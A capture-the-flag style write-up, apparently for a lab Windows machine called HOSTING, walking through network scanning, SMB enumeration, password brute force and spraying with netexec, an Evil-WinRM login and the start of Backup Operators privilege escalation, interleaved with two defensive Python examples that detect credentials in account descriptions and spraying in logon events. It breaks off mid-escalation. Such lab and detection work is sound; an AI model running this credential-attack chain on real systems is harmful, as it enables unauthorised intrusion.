HOSTING
First of all, let's get to the Hosting machine. To find it on the local network we use arp-scan to discover the active hosts, which identifies 192.168.88.8, as you can see below.
┌──(kali㉿kali)-[~]
└─$ sudo arp-scan -I eth0 --localnet
Interface: eth0, type: EN10MB, MAC: 08:00:27:43:73:bc, IPv4: 192.168.88.5
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.88.1 d8:44:89:50:2d:a3 (Unknown)
192.168.88.8 08:00:27:98:d4:bf PCS Systemtechnik GmbH
192.168.88.9 00:e0:4c:69:66:4a REALTEK SEMICONDUCTOR CORP.
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.075 seconds (123.37 hosts/sec). 3 responded
┌──(kali㉿kali)-[~]
└─$ ping -c1 192.168.88.8
PING 192.168.88.8 (192.168.88.8) 56(84) bytes of data.
64 bytes from 192.168.88.8: icmp_seq=1 ttl=128 time=1.28 ms
--- 192.168.88.8 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 1.275/1.275/1.275/0.000 ms
After confirming that the host is reachable with ping, we run a full nmap scan. Its results are the key to the whole machine, revealing:
- Open ports: 80 (HTTP), 135 (MSRPC), 139 (NetBIOS-SSN), 445 (Microsoft-DS/SMB), and several high-numbered MSRPC ports.
- Operating system: Microsoft Windows (likely Windows 10 / Server 2019).
- Web server: Microsoft IIS httpd 10.0, with the title "IIS Windows".
- SMB/NetBIOS information: the NetBIOS name is HOSTING, and SMB message signing is enabled but not required.
Attempts to list SMB shares anonymously with smbclient and smbmap fail with access denied errors, showing that authentication is required. Similarly, netexec confirms that anonymous SMB access is denied.
┌──(kali㉿kali)-[~]
└─$ sudo nmap -n -Pn -p- --min-rate 5000 192.168.88.8 -vvv -sC -sV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-30 20:13 CEST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:13
Completed NSE at 20:13, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:13
Completed NSE at 20:13, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:13
Completed NSE at 20:13, 0.00s elapsed
Initiating ARP Ping Scan at 20:13
Scanning 192.168.88.8 [1 port]
Completed ARP Ping Scan at 20:13, 0.05s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 20:13
Scanning 192.168.88.8 [65535 ports]
Discovered open port 445/tcp on 192.168.88.8
Discovered open port 135/tcp on 192.168.88.8
Discovered open port 139/tcp on 192.168.88.8
Discovered open port 80/tcp on 192.168.88.8
Increasing send delay for 192.168.88.8 from 0 to 5 due to 197 out of 656 dropped probes since last increase.
Increasing send delay for 192.168.88.8 from 5 to 10 due to 178 out of 593 dropped probes since last increase.
Increasing send delay for 192.168.88.8 from 10 to 20 due to 19 out of 63 dropped probes since last increase.
Increasing send delay for 192.168.88.8 from 20 to 40 due to 11 out of 36 dropped probes since last increase.
Increasing send delay for 192.168.88.8 from 40 to 80 due to 11 out of 19 dropped probes since last increase.
Increasing send delay for 192.168.88.8 from 80 to 160 due to 11 out of 24 dropped probes since last increase.
Increasing send delay for 192.168.88.8 from 160 to 320 due to 11 out of 17 dropped probes since last increase.
Increasing send delay for 192.168.88.8 from 320 to 640 due to 11 out of 13 dropped probes since last increase.
Increasing send delay for 192.168.88.8 from 640 to 1000 due to 11 out of 32 dropped probes since last increase.
Discovered open port 49668/tcp on 192.168.88.8
Discovered open port 49664/tcp on 192.168.88.8
Discovered open port 49669/tcp on 192.168.88.8
Discovered open port 49667/tcp on 192.168.88.8
Discovered open port 49666/tcp on 192.168.88.8
Discovered open port 49665/tcp on 192.168.88.8
Discovered open port 49670/tcp on 192.168.88.8
Completed SYN Stealth Scan at 20:13, 22.99s elapsed (65535 total ports)
Initiating Service scan at 20:13
Scanning 11 services on 192.168.88.8
Service scan Timing: About 45.45% done; ETC: 20:15 (0:01:05 remaining)
Completed Service scan at 20:14, 53.84s elapsed (11 services on 1 host)
NSE: Script scanning 192.168.88.8.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:14
Completed NSE at 20:14, 5.22s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:14
Completed NSE at 20:14, 0.02s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:14
Completed NSE at 20:14, 0.01s elapsed
Nmap scan report for 192.168.88.8
Host is up, received arp-response (0.00080s latency).
Scanned at 2025-04-30 20:13:30 CEST for 82s
Not shown: 65524 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 128 Microsoft IIS httpd 10.0
|_http-title: IIS Windows
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 128 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 128
49664/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49670/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
MAC Address: 08:00:27:98:D4:BF (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
|_clock-skew: -2s
| nbstat: NetBIOS name: HOSTING, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:98:d4:bf (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
| Names:
|   HOSTING<00> Flags: <unique><active>
|   WORKGROUP<00> Flags: <group><active>
|   HOSTING<20> Flags: <unique><active>
| Statistics:
|   08:00:27:98:d4:bf:00:00:00:00:00:00:00:00:00:00:00
|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_  00:00:00:00:00:00:00:00:00:00:00:00:00:00
| smb2-time:
|   date: 2025-04-30T18:14:45
|_  start_date: N/A
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 47899/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 64842/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 33952/udp): CLEAN (Timeout)
|   Check 4 (port 51934/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:14
Completed NSE at 20:14, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:14
Completed NSE at 20:14, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:14
Completed NSE at 20:14, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 82.51 seconds
Raw packets sent: 114549 (5.040MB) | Rcvd: 65538 (2.622MB)
Now we can try listing the SMB shares with the command you can see below: smbclient -N -L //192.168.88.8
┌──(kali㉿kali)-[~]
└─$ smbclient -N -L //192.168.88.8
session setup failed: NT_STATUS_ACCESS_DENIED
In addition, we try smbmap to see whether it is possible to obtain some information, but as you can see below there is nothing with this command:
┌──(kali㉿kali)-[~]
└─$ smbmap -u '' -p '' -d HOSTING -H 192.168.88.8
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[\] Checking for open ports...
[*] Detected 1 hosts serving SMB
[|] Authenticating...
[*] Established 1 SMB connections(s) and 0 authenticated session(s)
[/] Authenticating...
[!] Something weird happened on (192.168.88.8) Error occurs while reading from remote(104) on line 1015
[-] Closing connections..
[\] Closing connections..
[|] Closing connections..
[/] Closing connections..
[-] Closing connections..
[*] Closed 1 connections
As the SMB port (445) is open, we also try listing with netexec and empty credentials, with the command you can see below.
┌──(kali㉿kali)-[~]
└─$ netexec smb 192.168.88.8 -u '' -p ''
SMB 192.168.88.8 445 HOSTING [*] Windows 10 / Server 2019 Build 19041 x64 (name:HOSTING) (domain:HOSTING) (signing:False) (SMBv1:False)
SMB 192.168.88.8 445 HOSTING [-] HOSTING\: STATUS_ACCESS_DENIED
We then shift to web enumeration with gobuster against the HTTP service (port 80). Although the scan was interrupted, it discovered two directories: /speed and /Speed. Crucially, we also obtain a list of potential usernames (shown as e-mail addresses below): p.smith, a.krist, m.faeny, k.lendy.
We process this list to create a clean usuarios_encontrados file, as you can see below.
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://192.168.88.8/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,bak
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.88.8/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,bak
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/speed (Status: 301) [Size: 160] [--> http://192.168.88.8/speed/]
/Speed (Status: 301) [Size: 160] [--> http://192.168.88.8/Speed/]
Progress: 695421 / 882240 (78.82%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 695686 / 882240 (78.85%)
===============================================================
Finished
===============================================================
p.smith@hosting.nyx
a.krist@hosting.nyx
m.faeny@hosting.nyx
k.lendy@hosting.nyx
Now we create a user list for the brute-force attempt, saved in the file usuarios.txt.
┌──(kali㉿kali)-[~]
└─$ sudo nano usuarios.txt
But we need to strip the domain part. First, tr replaces the @ with a space, with the command you can see below.
┌──(kali㉿kali)-[~]
└─$ cat usuarios.txt | tr "@" " "
p.smith hosting.nyx
a.krist hosting.nyx
m.faeny hosting.nyx
k.lendy hosting.nyx
Then awk '{print $1}' keeps only the first field, the username, as you can see below.
┌──(kali㉿kali)-[~]
└─$ cat usuarios.txt | tr "@" " " | awk '{print$1}'
p.smith
a.krist
m.faeny
k.lendy
Finally, we redirect the result to a file named usuarios_encontrados:
┌──(kali㉿kali)-[~]
└─$ cat usuarios.txt | tr "@" " " | awk '{print$1}' > usuarios_encontrados
┌──(kali㉿kali)-[~]
└─$ cat usuarios_encontrados
p.smith
a.krist
m.faeny
k.lendy
Now, by brute force, we discover the password kissme, as you can see in the output below.
┌──(kali㉿kali)-[~]
└─$ netexec smb 192.168.88.8 -u usuarios_encontrados -p /usr/share/wordlists/rockyou.txt --ignore-pw-decoding
SMB 192.168.88.8 445 HOSTING [*] Windows 10 / Server 2019 Build 19041 x64 (name:HOSTING) (domain:HOSTING) (signing:False) (SMBv1:False)
SMB 192.168.88.8 445 HOSTING [-] HOSTING\p.smith:123456 STATUS_LOGON_FAILURE
SMB 192.168.88.8 445 HOSTING [-] HOSTING\a.krist:123456 STATUS_LOGON_FAILURE
SMB 192.168.88.8 445 HOSTING [-] HOSTING\m.faeny:123456 STATUS_LOGON_FAILURE
SMB 192.168.88.8 445 HOSTING [-] HOSTING\k.lendy:123456 STATUS_LOGON_FAILURE
SMB 192.168.88.8 445 HOSTING [-] HOSTING\p.smith:12345 STATUS_LOGON_FAILURE
SMB 192.168.88.8 445 HOSTING [-] HOSTING\a.krist:12345 STATUS_LOGON_FAILURE
SMB 192.168.88.8 445 HOSTING [-] HOSTING\m.faeny:12345 STATUS_LOGON_FAILURE
SMB 192.168.88.8 445 HOSTING [-] HOSTING\k.lendy:12345 STATUS_LOGON_FAILURE
SMB 192.168.88.8 445 HOSTING [-] HOSTING\k.lendy:booboo STATUS_LOGON_FAILURE
SMB 192.168.88.8 445 HOSTING [+] HOSTING\p.smith:kissme
Now we verify that the discovered password is correct with the command you can see below.
┌──(kali㉿kali)-[~]
└─$ netexec smb 192.168.88.8 -u 'p.smith' -p 'kissme'
SMB 192.168.88.8 445 HOSTING [*] Windows 10 / Server 2019 Build 19041 x64 (name:HOSTING) (domain:HOSTING) (signing:False) (SMBv1:False)
SMB 192.168.88.8 445 HOSTING [+] HOSTING\p.smith:kissme
Let's list the shares with --shares, as you can see below on the screen: we find IPC$ readable, which should let us discover new users.
┌──(kali㉿kali)-[~]
└─$ netexec smb 192.168.88.8 -u 'p.smith' -p 'kissme' --shares
SMB 192.168.88.8 445 HOSTING [*] Windows 10 / Server 2019 Build 19041 x64 (name:HOSTING) (domain:HOSTING) (signing:False) (SMBv1:False)
SMB 192.168.88.8 445 HOSTING [+] HOSTING\p.smith:kissme
SMB 192.168.88.8 445 HOSTING [*] Enumerated shares
SMB 192.168.88.8 445 HOSTING Share Permissions Remark
SMB 192.168.88.8 445 HOSTING ----- ----------- ------
SMB 192.168.88.8 445 HOSTING ADMIN$ Admin remota
SMB 192.168.88.8 445 HOSTING C$ Recurso predeterminado
SMB 192.168.88.8 445 HOSTING IPC$ READ IPC remota
Let's enumerate the users with --users, as you can see below on the screen: through IPC$ we discover new users, and the description field of m.davis even contains a password.
┌──(kali㉿kali)-[~]
└─$ netexec smb 192.168.88.8 -u 'p.smith' -p 'kissme' --users
SMB 192.168.88.8 445 HOSTING [*] Windows 10 / Server 2019 Build 19041 x64 (name:HOSTING) (domain:HOSTING) (signing:False) (SMBv1:False)
SMB 192.168.88.8 445 HOSTING [+] HOSTING\p.smith:kissme
SMB 192.168.88.8 445 HOSTING -Username- -Last PW Set- -BadPW- -Description-
SMB 192.168.88.8 445 HOSTING Administrador 2024-09-02 16:24:30 0
SMB 192.168.88.8 445 HOSTING administrator 2024-09-02 17:17:47 0
SMB 192.168.88.8 445 HOSTING DefaultAccount 2024-09-02 16:24:40 0
SMB 192.168.88.8 445 HOSTING f.miller 2024-09-02 16:28:55 0
SMB 192.168.88.8 445 HOSTING Invitado 2024-09-02 16:24:48 0
SMB 192.168.88.8 445 HOSTING j.wilson 2024-09-02 16:31:36 0
SMB 192.168.88.8 445 HOSTING m.davis 2024-09-02 16:29:54 0 H0$T1nG123!
SMB 192.168.88.8 445 HOSTING p.smith 2024-09-02 16:18:30 0
SMB 192.168.88.8 445 HOSTING WDAGUtilityAccount <never> 0
SMB 192.168.88.8 445 HOSTING [*] Enumerated 9 local users: HOSTING
And now we repeat the same process as when the first users were discovered: we create a user list for brute force, this time in the file usuarios1.txt.
┌──(kali㉿kali)-[~]
└─$ cat usuarios1.txt
SMB 192.168.88.8 445 HOSTING Administrador 2024-09-02 16:24:30 0
SMB 192.168.88.8 445 HOSTING administrator 2024-09-02 17:17:47 0
SMB 192.168.88.8 445 HOSTING DefaultAccount 2024-09-02 16:24:40 0
SMB 192.168.88.8 445 HOSTING f.miller 2024-09-02 16:28:55 0
SMB 192.168.88.8 445 HOSTING Invitado 2024-09-02 16:24:48 0
SMB 192.168.88.8 445 HOSTING j.wilson 2024-09-02 16:31:36 0
SMB 192.168.88.8 445 HOSTING m.davis 2024-09-02 16:29:54 0 H0$T1nG123!
SMB 192.168.88.8 445 HOSTING p.smith 2024-09-02 16:18:30 0
SMB 192.168.88.8 445 HOSTING WDAGUtilityAccount <never> 0
Then awk '{print $5}' keeps only the username column:
┌──(kali㉿kali)-[~]
└─$ cat usuarios1.txt |awk '{print $5}'
Administrador
administrator
DefaultAccount
f.miller
Invitado
j.wilson
m.davis
p.smith
WDAGUtilityAccount
And we redirect it to a file named usuarios_nuevos with the command you can see below.
┌──(kali㉿kali)-[~]
└─$ cat usuarios1.txt |awk '{print $5}' > usuarios_nuevos
┌──(kali㉿kali)-[~]
└─$ cat usuarios_nuevos
Administrador
administrator
DefaultAccount
f.miller
Invitado
j.wilson
m.davis
p.smith
WDAGUtilityAccount
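The two list-building steps above (stripping the domain from the e-mail addresses, and taking the fifth column of the --users output) are the same parsing a defender needs when reviewing netexec output, with one extra check: the description field of a local account is readable by any user who can enumerate accounts over SMB, as p.smith does above, so a password stored there, as for m.davis, is exposed to every such user. The following Python is an added example, not part of this write-up or of netexec: it parses output in the format shown above into usernames and flags descriptions that look like credentials. The sample output and the credential heuristic are constructed assumptions for illustration.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# One account row of `netexec smb ... --users` output, in the layout shown above:
# SMB <host> <port> <netbios> <name> <last pw set | <never>> <badpw> [<description>]
USER_LINE = re.compile(
    r"^SMB\s+(?P<host>\S+)\s+(?P<port>\d+)\s+(?P<netbios>\S+)\s+"
    r"(?P<name>\S+)\s+"
    r"(?P<lastpw><never>|\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\s+"
    r"(?P<badpw>\d+)"
    r"(?:\s+(?P<desc>.*\S))?\s*$"
)


@dataclass
class LocalUser:
    name: str
    last_pw_set: str
    bad_pw: int
    description: str


def parse_users(text: str) -> list[LocalUser]:
    """Keep only account rows; banner, header and status lines do not match USER_LINE."""
    users = []
    for line in text.splitlines():
        m = USER_LINE.match(line.strip())
        if m:
            users.append(LocalUser(m["name"], m["lastpw"], int(m["badpw"]), m["desc"] or ""))
    return users


def usernames(users: list[LocalUser]) -> list[str]:
    """The same list that `awk '{print $5}'` produces above."""
    return [u.name for u in users]


def emails_to_usernames(text: str) -> list[str]:
    """The `tr "@" " " | awk '{print $1}'` step: keep the local part of each address."""
    return [line.split("@", 1)[0].strip() for line in text.splitlines() if "@" in line]


# Heuristic (assumed): a password keyword, or a token of 8+ chars with mixed case, a digit and a symbol.
SECRET_WORDS = re.compile(r"pass|pwd|contrase|clave|secret|cred|token", re.IGNORECASE)


def looks_like_secret(text: str) -> bool:
    if SECRET_WORDS.search(text):
        return True
    for tok in text.split():
        if (len(tok) >= 8 and re.search(r"[a-z]", tok) and re.search(r"[A-Z]", tok)
                and re.search(r"\d", tok) and re.search(r"[^A-Za-z0-9]", tok)):
            return True
    return False


def flag_credential_descriptions(users: list[LocalUser]) -> list[tuple[str, str]]:
    """Accounts whose description field looks like a stored credential."""
    return [(u.name, u.description) for u in users
            if u.description and looks_like_secret(u.description)]


# Constructed sample modelled on the --users output above; not the tool's real output.
SAMPLE_USERS_OUTPUT = """\
SMB 192.168.88.8 445 HOSTING [*] Windows 10 / Server 2019 Build 19041 x64 (name:HOSTING) (domain:HOSTING) (signing:False) (SMBv1:False)
SMB 192.168.88.8 445 HOSTING [+] HOSTING\\p.smith:kissme
SMB 192.168.88.8 445 HOSTING -Username- -Last PW Set- -BadPW- -Description-
SMB 192.168.88.8 445 HOSTING Administrador 2024-09-02 16:24:30 0
SMB 192.168.88.8 445 HOSTING f.miller 2024-09-02 16:28:55 0
SMB 192.168.88.8 445 HOSTING j.wilson 2024-09-02 16:31:36 0 Temporary account
SMB 192.168.88.8 445 HOSTING m.davis 2024-09-02 16:29:54 0 H0$T1nG123!
SMB 192.168.88.8 445 HOSTING WDAGUtilityAccount <never> 0
SMB 192.168.88.8 445 HOSTING [*] Enumerated 5 local users: HOSTING
"""

# Constructed sample of the e-mail list format shown above.
SAMPLE_EMAILS = "p.smith@hosting.nyx\na.krist@hosting.nyx\n"

if __name__ == "__main__":
    found = parse_users(SAMPLE_USERS_OUTPUT)
    print("users:", usernames(found))
    print("from e-mails:", emails_to_usernames(SAMPLE_EMAILS))
    for name, desc in flag_credential_descriptions(found):
        print(f"[!] {name}: description looks like a credential -> {desc!r}")
```

The regex deliberately requires the "last password set" column to be a timestamp or `<never>`, which is what filters out the banner, the header row and the `[*]`/`[+]` status lines without any special-casing; a real audit would also treat the description as sensitive for local accounts that are disabled, since their descriptions are still enumerable.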
In addition, we try the new user file with the password discovered before, as you can see below.
┌──(kali㉿kali)-[~]
└─$ netexec smb 192.168.88.8 -u usuarios_nuevos -p 'H0$T1nG123!'
SMB 192.168.88.8 445 HOSTING [*] Windows 10 / Server 2019 Build 19041 x64 (name:HOSTING) (domain:HOSTING) (signing:False) (SMBv1:False)
SMB 192.168.88.8 445 HOSTING [-] HOSTING\Administrador:H0$T1nG123! STATUS_LOGON_FAILURE
SMB 192.168.88.8 445 HOSTING [-] HOSTING\administrator:H0$T1nG123! STATUS_LOGON_FAILURE
SMB 192.168.88.8 445 HOSTING [-] HOSTING\DefaultAccount:H0$T1nG123! STATUS_LOGON_FAILURE
SMB 192.168.88.8 445 HOSTING [-] HOSTING\f.miller:H0$T1nG123! STATUS_LOGON_FAILURE
SMB 192.168.88.8 445 HOSTING [-] HOSTING\Invitado:H0$T1nG123! STATUS_LOGON_FAILURE
SMB 192.168.88.8 445 HOSTING [+] HOSTING\j.wilson:H0$T1nG123!
Now we verify that the discovered password is correct with the command you can see below.
┌──(kali㉿kali)-[~]
└─$ netexec smb 192.168.88.8 -u 'j.wilson' -p 'H0$T1nG123!'
SMB 192.168.88.8 445 HOSTING [*] Windows 10 / Server 2019 Build 19041 x64 (name:HOSTING) (domain:HOSTING) (signing:False) (SMBv1:False)
SMB 192.168.88.8 445 HOSTING [+] HOSTING\j.wilson:H0$T1nG123!
This is the most important part, because we should verify whether it is possible to enter the machine; for that we execute the command you can see below for each user:
netexec smb win-rm 192.168.88.8 -u 'p.smith' -p 'kissme'
┌──(kali㉿kali)-[~]
└─$ netexec smb win-rm 192.168.88.8 -u 'p.smith' -p 'kissme'
SMB 192.168.88.8 445 HOSTING [*] Windows 10 / Server 2019 Build 19041 x64 (name:HOSTING) (domain:HOSTING) (signing:False) (SMBv1:False)
SMB 192.168.88.8 445 HOSTING [+] HOSTING\p.smith:kissme
Running nxc against 2 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
netexec smb win-rm 192.168.88.8 -u 'j.wilson' -p 'H0$T1nG123!'
┌──(kali㉿kali)-[~]
└─$ netexec smb win-rm 192.168.88.8 -u 'j.wilson' -p 'H0$T1nG123!'
SMB 192.168.88.8 445 HOSTING [*] Windows 10 / Server 2019 Build 19041 x64 (name:HOSTING) (domain:HOSTING) (signing:False) (SMBv1:False)
SMB 192.168.88.8 445 HOSTING [+] HOSTING\j.wilson:H0$T1nG123!
Running nxc against 2 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
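From the defender's side, the two netexec runs above (a wordlist against four accounts, then one password sprayed across the whole user list) leave a distinctive trail on the target: bursts of failed logons (Windows Security event 4625) from one source, followed by a success (4624) from the same source. The following Python is an added example, not part of the original write-up: it runs a simple window-based detector over a constructed set of events modelled on that activity and separates the two patterns, many failures against one account versus one failure against many accounts. The thresholds, the event field names and the sample data are assumptions for illustration; a real deployment would read the events from the event log or a SIEM.

```python
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=5)     # detection window (assumed value)
BRUTE_FORCE_MIN_FAILURES = 10     # failures against one account from one source (assumed)
SPRAY_MIN_ACCOUNTS = 5            # distinct accounts failed from one source (assumed)


def make_event(ts, event_id, user, ip, status="0xC000006D"):
    """Minimal stand-in for a Windows Security logon event (4625 failure / 4624 success)."""
    return {"TimeCreated": ts, "EventID": event_id, "TargetUserName": user,
            "IpAddress": ip, "Status": status}


def detect(events):
    """Return sorted findings: ('brute_force', ip, account) or ('password_spray', ip, None)."""
    failures = defaultdict(list)  # source ip -> [(time, account)]
    for e in events:
        if e["EventID"] == 4625:
            failures[e["IpAddress"]].append((e["TimeCreated"], e["TargetUserName"]))
    findings = set()
    for ip, items in failures.items():
        items.sort()
        # Slide a window starting at every failure and count per-account failures inside it.
        for start, (t_start, _) in enumerate(items):
            per_account = defaultdict(int)
            for t, account in items[start:]:
                if t - t_start > WINDOW:
                    break
                per_account[account] += 1
            for account, n in per_account.items():
                if n >= BRUTE_FORCE_MIN_FAILURES:
                    findings.add(("brute_force", ip, account))
            if len(per_account) >= SPRAY_MIN_ACCOUNTS:
                findings.add(("password_spray", ip, None))
    return sorted(findings, key=lambda f: (f[0], f[1], f[2] or ""))


def successes_after_attack(events, findings):
    """Successful logons (4624) from a source already flagged: the guessed credential."""
    flagged = {ip for _, ip, _ in findings}
    return sorted({(e["IpAddress"], e["TargetUserName"]) for e in events
                   if e["EventID"] == 4624 and e["IpAddress"] in flagged})


def build_sample_events():
    """Constructed events modelled on the netexec runs above; not real log data."""
    events = []
    t0 = datetime(2025, 4, 30, 20, 30, 0)
    attacker = "192.168.88.5"
    # Phase 1: wordlist against four accounts, many attempts per account.
    for i in range(12):
        for user in ("p.smith", "a.krist", "m.faeny", "k.lendy"):
            events.append(make_event(t0 + timedelta(seconds=i), 4625, user, attacker))
    events.append(make_event(t0 + timedelta(seconds=13), 4624, "p.smith", attacker))
    # Phase 2: one password tried once against every account in the list.
    t1 = t0 + timedelta(minutes=20)
    spray_targets = ("Administrador", "administrator", "DefaultAccount", "f.miller", "Invitado")
    for i, user in enumerate(spray_targets):
        events.append(make_event(t1 + timedelta(seconds=i), 4625, user, attacker))
    events.append(make_event(t1 + timedelta(seconds=6), 4624, "j.wilson", attacker))
    # Noise: a single mistyped password from another workstation.
    events.append(make_event(t0 + timedelta(minutes=5), 4625, "f.miller", "192.168.88.20"))
    return events


SAMPLE_EVENTS = build_sample_events()

if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for kind, ip, account in found:
        print(f"[{kind}] source={ip} account={account or '*'}")
    for ip, account in successes_after_attack(SAMPLE_EVENTS, found):
        print(f"[success after attack] {ip} -> {account}")
```

The spray rule is the one that matters for the second run: each account sees only one failure, so a per-account lockout or threshold never fires, and only the count of distinct accounts from one source exposes it. Correlating the later 4624 with the flagged source turns a noisy alert into a concrete answer to "which credential did they get".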
Now we try whether we can enter the Windows machine; for that we execute the command you can see below: sudo evil-winrm -i 192.168.88.8 -u 'p.smith' -p 'kissme'
┌──(kali㉿kali)-[~]
└─$ sudo evil-winrm -i 192.168.88.8 -u 'p.smith' -p 'kissme'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
With the user p.smith we were not able to enter, maybe because this user does not have the permissions, as you can see at the bottom of the screen. Now we try whether we can enter the Windows machine as j.wilson; for that we execute the command you can see below:
sudo evil-winrm -i 192.168.88.8 -u 'j.wilson' -p 'H0$T1nG123!'
┌──(kali㉿kali)-[~]
└─$ sudo evil-winrm -i 192.168.88.8 -u 'j.wilson' -p 'H0$T1nG123!'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\j.wilson\Documents> whoami
hosting\j.wilson
*Evil-WinRM* PS C:\Users\j.wilson\Documents> ls
*Evil-WinRM* PS C:\Users\j.wilson\Documents> dir
*Evil-WinRM* PS C:\Users\j.wilson\Documents> net user
Cuentas de usuario de \\
-------------------------------------------------------------------------------
Administrador administrator DefaultAccount
f.miller Invitado j.wilson
m.davis p.smith WDAGUtilityAccount
El comando se ha completado con uno o más errores.
Gotcha! We are able to enter the machine, so now we start privilege escalation. First we discover what this user can do on the machine, executing the commands you can see above:
- whoami (shows which user we are)
- ls (lists folders, files, etc.)
- dir (lists folders, files, etc.)
- net user (shows the users that exist on the Windows machine)
We discover that there are many users, but our objective is to become Administrator.
Now we run net user j.wilson to see what permissions and group memberships we have.
*Evil-WinRM* PS C:\Users\j.wilson\Documents>
*Evil-WinRM* PS C:\Users\j.wilson\Documents> net user j.wilson
Nombre de usuario j.wilson
Nombre completo John Wilson
Comentario
Comentario del usuario
Código de país o región 000 (Predeterminado por el equipo)
Cuenta activa Sí
La cuenta expira Nunca
Ultimo cambio de contraseña 02/09/2024 18:31:36
La contraseña expira Nunca
Cambio de contraseña 02/09/2024 18:31:36
Contraseña requerida No
El usuario puede cambiar la contraseña Sí
Estaciones de trabajo autorizadas Todas
Script de inicio de sesión
Perfil de usuario
Directorio principal
Ultima sesión iniciada 30/04/2025 20:45:40
Horas de inicio de sesión autorizadas Todas
Miembros del grupo local *Operadores de copia d
*Usuarios
*Usuarios de administr
Miembros del grupo global *Ninguno
Se ha completado el comando correctamente.
The most important thing is the group membership: we are in the backup operators group, so we are able to make backups. Now let's execute whoami /priv:
*Evil-WinRM* PS C:\Users\j.wilson\Documents> whoami /priv
INFORMACIÓN DE PRIVILEGIOS
--------------------------
Nombre de privilegio Descripción Estado
============================= =================================================== ==========
SeBackupPrivilege Hacer copias de seguridad de archivos y directorios Habilitada
SeRestorePrivilege Restaurar archivos y directorios Habilitada
SeShutdownPrivilege Apagar el sistema Habilitada
SeChangeNotifyPrivilege Omitir comprobación de recorrido Habilitada
SeUndockPrivilege Quitar equipo de la estación de acoplamiento Habilitada
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Habilitada
SeTimeZonePrivilege Cambiar la zona horaria Habilitada
Now we execute the next commands on the way to obtaining a shell as Administrator:
*Evil-WinRM* PS C:\Users\j.wilson\Documents> cd ..
*Evil-WinRM* PS C:\Users\j.wilson> mkdir C:\temp
Directorio: C:\
Mode LastWriteTime Length Name
